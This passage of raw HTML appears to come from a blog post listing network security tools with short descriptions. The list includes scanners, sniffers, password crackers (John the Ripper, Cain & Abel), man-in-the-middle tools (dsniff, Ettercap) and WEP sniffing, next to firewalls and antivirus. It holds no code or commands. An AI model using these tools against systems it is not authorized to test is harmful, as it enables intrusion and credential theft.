c:/tools/example&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Go surf for these tools enlisted.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.insecure.org/nmap/nmap_download.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Nmap is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts."&gt;NMAP : Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.nessus.org/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="The premier Open Source vulnerability assessment tool. Nessus is a remote security scanner for Linux, BSD, Solaris, and other Unix like OS's"&gt;Nessus :&amp;nbsp;&lt;/a&gt;Scanning &amp;amp; Enumeration&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.ethereal.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Ethereal is a free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk."&gt;Ethereal&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snort.org/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Snort is a lightweight network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis, content searching/matching and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more"&gt;Snort&amp;nbsp; :&amp;nbsp;&lt;/a&gt;Network Hacking&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.atstake.com/research/tools/network_utilities/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="A simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities."&gt;Netcat&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.tcpdump.org/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Tcpdump is a well-known and well-loved text-based network packet analyzer. It can be used to print out the headers of packets on a network interface that matches a given expression."&gt;TCPDump&lt;/a&gt;&amp;nbsp;: For sniffing TCP Packets&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://windump.polito.it/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Windows port of Tcpdump."&gt;WinDump&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.hping.org/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="hping2 assembles and sends custom ICMP/UDP/TCP packets and displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities."&gt;Hping2&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://naughty.monkey.org/~dugsong/dsniff/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI"&gt;DSniff&lt;/a&gt;&amp;nbsp;: Sniffing Data Packets&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.gfi.com/lannetscan/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="LANguard scans networks and reports information such as service pack level of each machine, missing security patches, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more"&gt;GFI LANguard&lt;/a&gt;&amp;nbsp;: LAN Security&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://ettercap.sourceforge.net/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like SSH and HTTPS). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN."&gt;Ettercap&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.wiretrip.net/rfp/p/doc.asp?id=21&amp;amp;iface=2" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Whisker is a scanner which allows you to test HTTP servers for many known security holes, particularly the presence of dangerous CGIs"&gt;Whisker/Libwhisker&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.openwall.com/john/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches."&gt;John the Ripper&lt;/a&gt;&amp;nbsp;: Password Cracking Utility&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.openssh.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="A secure way to access remote computers"&gt;OpenSSH&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.samspade.org/ssw/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more"&gt;Sam Spade&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.iss.net/products_services/enterprise_protection/vulnerability_assessment/scanner_internet.php" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Application-level vulnerability assessment. ISS Internet Scanner is pretty good, but is not cheap."&gt;ISS Internet Scanner&lt;/a&gt;&amp;nbsp;: Web Server Security&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.tripwire.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="A file and directory integrity checker. Tripwire is a tool that aids system administrators and users in monitoring a designated set of files for any changes."&gt;Tripwire&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.cirt.net/code/nikto.shtml" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Nikto is a web server scanner which looks for over 2000 potentially dangerous files/CGIs and problems on over 200 servers"&gt;Nikto&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.kismetwireless.net/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Kismet is an 802.11b network sniffer and network dissector. It is capable of sniffing using most wireless cards, automatic network IP block detection via UDP, ARP, and DHCP packets, Cisco equipment lists via Cisco Discovery Protocol, weak cryptographic packet logging, and Ethereal and tcpdump compatible packet dump files. It also includes the ability to plot detected networks and estimated network ranges on downloaded maps or user supplied image files."&gt;Kismet&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&amp;amp;subcontent=/resources/proddesc/superscan.htm" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="A connect-based TCP port scanner, pinger and hostname resolver"&gt;SuperScan :&lt;/a&gt;&amp;nbsp;Another Great Scanner&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.oxid.it/cain.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Cain &amp;amp; Abel is a free password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary &amp;amp; Brute-Force attacks, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols"&gt;Cain &amp;amp; Abel&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.solarwinds.net/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="SolarWinds has created and sells dozens of special-purpose tools targetted at systems administrators. Security related tools include many network discovery scanners and an SNMP brute-force cracker"&gt;SolarWinds Toolsets&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.ntop.org/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Ntop shows network usage in a way similar to what top does for processes. In interactive mode, it displays the network status on the user's terminal. In Web mode, it acts as a Web server, creating an HTML dump of the network status. It sports a NetFlow/sFlow emitter/collector, an HTTP-based client interface for creating ntop-centric monitoring applications, and RRD for persistently storing traffic statistics."&gt;NTop&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.packetfactory.net/projects/nemesis/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux (and now Windows!). The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts"&gt;Nemesis&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.citi.umich.edu/u/provos/honeyd/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their TCP personality can be adapted so that they appear to be running certain versions of operating systems. Honeyd enables a single host to claim multiple addresses on a LAN for network simulation. It is possible to ping the virtual machines, or to traceroute them. Any type of service on the virtual machine can be simulated according to a simple configuration file. It is also possible to proxy services to another machine rather than simulating them"&gt;Honeyd&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://achilles.mavensecurity.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Achilles is a tool designed for testing the security of web applications. Achilles is a proxy server, which acts as a man-in-the-middle during an HTTP session. A typical HTTP proxy will relay packets to and from a client browser and a web server. Achilles will intercept an HTTP session's data in either direction and give the user the ability to alter the data before transmission. For example, during a normal HTTP SSL connection a typical proxy will relay the session between the server and the client and allow the two end nodes to negotiate SSL. In contrast, when in intercept mode, Achilles will pretend to be the server and negotiate two SSL sessions, one with the client browser and another with the web server. As data is transmitted between the two nodes, Achilles decrypts the data and gives the user the ability to alter and/or log the data in clear text before transmission."&gt;Achilles&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.packetfactory.net/projects/firewalk/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Firewalk employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. "&gt;Firewalk&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.grisoft.com/us/us_dwnl_free.php" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Grisofts free virus scanner. A nice antivirus tool"&gt;AVG Free Antivirus&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.trendmicro.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Trend Micros free online virus scan. Disinfect your computer without having to install a program"&gt;Trend Micro online scan&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.tinysoftware.com/home/tiny2?la=EN" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Tiny firewall is an excellent product to keep out pesky intruders or to just log activity on your PC."&gt;Tiny Firewall&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://securityresponse.symantec.com/avcenter/tools.list.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Symantecs virus removal tool library. From blaster to mydoom you can find a tool to remove it here"&gt;Symantec Virus Tools&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.linuxsoft.cz/en/redirect.php?id_download=963" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="The Linux Security Auditing Tool (LSAT) is a post install security auditor for Linux/Unix. It checks many system configurations and local network settings on the system for common security/config errors and for packages that are not needed. "&gt;Linux Security Audit Tool&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.fwbuilder.org/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Firewall Builder is multi-platform firewall configuration and management tool. It consists of a GUI and set of policy compilers for various firewall platforms. Firewall Builder uses object-oriented approach, it helps administrator maintain a database of network objects and allows policy editing using simple drag-and-drop operations. Firewall Builder currently supports iptables, ipfilter, OpenBSD PF and Cisco PIX. "&gt;Firewall Builder&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.ipcop.org/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Linux Firewall configurable over web interface. IPCop implements existing technology, secure programming practices and outstanding new concepts to make it ‘the’ Linux Distribution for protecting single home computers, to large corporate networks from intrusions and attacks. Whether for your home, or SOHO, IPCop will scale to fit your needs. IPCop has even been rumoured to be implemented and protecting larger, more complex networks too."&gt;IPCop&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://airsnort.shmoo.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Wi-Fi sniffer. It can recognize SSID of card, name of network, packets encrypted by WEP, etc"&gt;AirSnort&lt;/a&gt;&amp;nbsp;: Wireless Network Hacking&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.fish.com/satan/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="SATAN is a tool to help systems administrators. It recognizes several common networking-related security problems, and reports the problems without actually exploiting them."&gt;SATAN&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.rootkit.nl/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="Rootkit Hunter scans files and systems for known and unknown rootkits, backdoors, and sniffers"&gt;Rootkit Hunter :&amp;nbsp;&lt;/a&gt;To find out installed root kits&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;.&lt;/strong&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.spamassassin.org/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="Spam Assasin"&gt;SpamAssassin&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.grsecurity.net/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="grsecurity is a complete security system for Linux 2.4 that implements a detection/prevention/containment strategy. It prevents most forms of address space modification, confines programs via its Role-Based Access Control system, hardens syscalls, provides full-featured auditing, and implements many of the OpenBSD randomness features"&gt;grsecurity&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.ip-scanner.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" title="IPScanner is a tool that is designed for the day-to-day monitoring of computers within Microsoft networking environments. It allows you to gather information from computers in the network without installing server-side applications on these computers. With its powerful engine, this utility can scan hundreds of computers or your entire network ,IP by IP, using different scan types and can help you make "&gt;IP-Scanner&lt;/a&gt;&amp;nbsp;: To scan IP Ranges&lt;/li&gt;
